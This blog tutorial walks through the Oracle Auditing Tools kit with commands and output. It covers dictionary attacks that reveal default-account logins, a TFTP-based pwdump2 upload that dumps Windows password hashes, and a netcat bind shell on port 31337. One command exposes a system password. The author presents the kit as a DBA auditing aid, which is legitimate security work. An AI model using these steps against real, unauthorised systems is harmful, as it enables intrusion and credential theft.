“Oracle Auditing Tools”for Oracle

This is guide for an open source utility "Oracle Auditing Tools", which offers password
guessing, query tool, listener check and more.

The toolkit consists of the following tools:

 OraclePWGuess (opwg.bat) - A dictionary attack tool that can be used with

usersupplied dictionaries or with the builtin support for finding default accounts.
 OracleQuery (oquery.bat) - A minimalistic command line based sql query tool.
 OracleSamDump (osd.bat) - Connects to the Oracle server and executes TFTP
get, to fetch the pwdump2 binary. The server is then pwdump2:ed and the result is
returned to the SAM folder of the TFTP server.
 OracleSysExec - Can be run in interactive mode, letting the user specify
commands to be executed by the server or in automatic mode. In automatic mode,
netcat is tftpd over to the server and binds a shell to the tcp port 31337.
 OracleTNSCtrl - is used to query the TNS listener for various information, like
the Oracle lsnrctl utility. It is somewhat limited though. Use the help command to
see commands curently implemented.

To run this tool, we need:

 Java Runtime Environment or Jave Developer Kit

 Oracle JDBC Driver (classes111.zip or classes12.zip

Before testing, we add the following entries to PATH and CLASSPATH:

 Add C:\Program Files\Java\jdk1.5.0_11\bin to PATH

 Edit .bat file as following

opwg.bat

@echo off
rem
rem OracleSamDump by Patrik Karlsson

set CP=.;C:/Jonathan/OracleServer/jdbc/lib/classes12.jar;ork.jar

rem @set CP=.;classes12.zip;ork.jar

java -classpath %CP% ork.OraclePwGuess %*

We run opwg.bat:
 C:\downloads\Oracle Tools\oat-binary-1.3.1\oat>opwg.bat -s hostserver
Oracle Password Guesser v1.3.1 by patrik@cqure.net
--------------------------------------------------
INFO: Running pwcheck on SID DB1
INFO: Running pwcheck on SID DB2
Successfully logged in with OLAPSYS/MANAGER
INFO: Running pwcheck on SID DB3
Skipping PLSExtProc ...
INFO: Running pwcheck on SID DB4
Successfully logged in with DBSNMP/DBSNMP
INFO: Running pwcheck on SID DB5
Successfully logged in with OWA_PUBLIC/OWA_PUBLIC
Successfully logged in with PORTAL30_DEMO/PORTAL30_DEMO
Successfully logged in with PORTAL30_PUBLIC/PORTAL30_PUBLIC
Successfully logged in with PORTAL30_SSO_PS/PORTAL30_SSO_PS
Successfully logged in with PORTAL30_SSO_PUBLIC/PORTAL30_SSO_PUBLIC
Successfully logged in with TRACESVR/TRACE

 That's very good. We now know what oracle account still use default password.

We run oquery.bat:

C:\downloads\Oracle Tools\oat-binary-1.3.1\oat>oquery.bat -s hostserver -d DB1 -u

system -p xxxxxx -q "select table_name,table_type from cat"

OracleQuery v1.3.1 by patrik@cqure.net

----------------------------------------
TABLE_NAME | TABLE_TYPE
AQ$DEF$_AQCALL | VIEW
AQ$DEF$_AQERROR | VIEW
AQ$_INTERNET_AGENTS | TABLE
AQ$_INTERNET_AGENT_PRIVS | TABLE
AQ$_QUEUES | TABLE
AQ$_QUEUE_TABLES | TABLE
AQ$_SCHEDULES | TABLE
CATALOG | SYNONYM
COL | SYNONYM
DEF$_AQCALL | TABLE
DEF$_AQERROR | TABLE
DEF$_CALLDEST | TABLE
DEF$_DEFAULTDEST | TABLE
DEF$_DESTINATION | TABLE
DEF$_ERROR | TABLE
DEF$_LOB | TABLE
DEF$_ORIGIN | TABLE
  A practical SQL query utility.

We run osd.bat:

C:\downloads\Oracle Tools\oat-binary-1.3.1\oat>osd.bat -s gold -u system -p cerial

-d test
Oracle Sam Dump v1.3.1 by patrik@cqure.net
------------------------------------------
INFO: Local IP seems to be 140.xxx.x.xxx
SERVER:[2] Tftp Server thread started.
INFO: Uploading PWDUMP2 to Oracle Server
INFO: Dumping the SAM on Oracle Server
INFO: Fetching sam.txt
INFO: If all went well, the server SAM file should be in tftproot/sam
INFO: Cleaning up !
INFO: Stopping TFTP Server

 Good utility to do password checking by extending pdwump2 to UNIX via TFTP

Note:PWDUMP2 is an application which dumps the password hashes (OWFs) from

NT's SAM database,
whether or not SYSKEY is enabled on the system.

Note: Abbreviation of Trivial File Transfer Protocol, a simple form of the File Transfer
Protocol
(FTP). TFTP uses the User Datagram Protocol (UDP)and provides no security features.
It is often used by servers to boot diskless workstations, X-terminals, and routers.

We run otnsctl.bat:

C:\downloads\Oracle Tools\oat-binary-1.3.1\oat>otnsctl.bat -s hostserver -I

Oracle TNS Control v1.3.1 by patrik@cqure.net
---------------------------------------------
tnscmd> help
help
set password - sets the password with which to connect to the listener
services - shows services
status - shows status
version - returns version information
tnscmd> version
TNSLSNR for Solaris: Version 9.2.0.6.0 - Production
TNS for Solaris: Version 9.2.0.6.0 - Production
Unix Domain Socket IPC NT Protocol Adaptor for Solaris: Version 9.2.0.6.0 -
Production
 Oracle Bequeath NT Protocol Adapter for Solaris: Version 9.2.0.6.0 - Production
TCP/IP NT Protocol Adapter for Solaris: Version 9.2.0.6.0 - Production

 can be used to secure Oracle listener.

We run ose.bat:

C:\downloads\Oracle Tools\oat-binary-1.3.1\oat>ose -s hostserver -u system -p

xxxxxx -d test -t Solaris
OracleSysExec v1.3.1 by patrik@cqure.net
----------------------------------------
INFO: Local IP seems to be 140.xxx.x.xxx
SERVER:[2] Tftp Server thread started.
Adding haxxor stuff for Solaris ...
INFO: Uploading netcat to Oracle Server
INFO: Sleeping for 2 seconds
INFO: Creating shell on port 31337
INFO: Cleaning up !
INFO: Don't forget to remove netcat when finnished !
INFO: Stopping TFTP Server

Note: Visit here for more on netcat.

Overall, "Oracle Auditing Tool" is a practical and feasible tool for DBA to monitoring
database security issues. Among "Oracle Auditing Tool", the most impressive one is
OraclePWGuess (opwg.bat). I ever used the utility offered in "Oracle Metalink Patch
4926128" to check the default oracle account. For a milti-instance environment, we need
to log on each instance respectively to run the provided SQL script. With
OraclePWGuess (opwg.bat), the only thing we need to is identifying name of host server.
Then, the utility will automatically go through every instance on that server. That's
fantastic.

Written by R.Wang
Blog: http://www.oraclepoint.com/oralife
More Resource: http://www.oraclepoint.com